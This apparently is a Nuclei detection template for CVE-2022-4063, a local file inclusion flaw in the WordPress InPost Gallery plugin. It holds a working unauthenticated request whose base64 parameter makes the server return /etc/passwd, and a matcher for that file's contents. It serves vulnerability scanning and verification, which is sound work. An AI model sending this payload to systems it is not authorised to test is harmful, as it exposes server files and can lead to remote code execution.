50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2022-4063
|
|
|
|
info:
|
|
name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
|
|
remediation: Fixed in version 2.1.4.1.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
|
|
- https://wordpress.org/plugins/inpost-gallery/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4063
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-4063
|
|
cwe-id: CWE-22
|
|
epss-score: 0.02354
|
|
epss-percentile: 0.88623
|
|
cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: pluginus
|
|
product: inpost_gallery
|
|
framework: wordpress
|
|
tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100d17f66aa35a75f98c207d8b41e4ec79b96d5c58abdf1597bbf8559946df80f00022040a6e246df383c509a146275b4c5b8f2db62e91ef1256c74cf24ba6bc9ffaa15:922c64590222798bb761d5b6d8e72950 |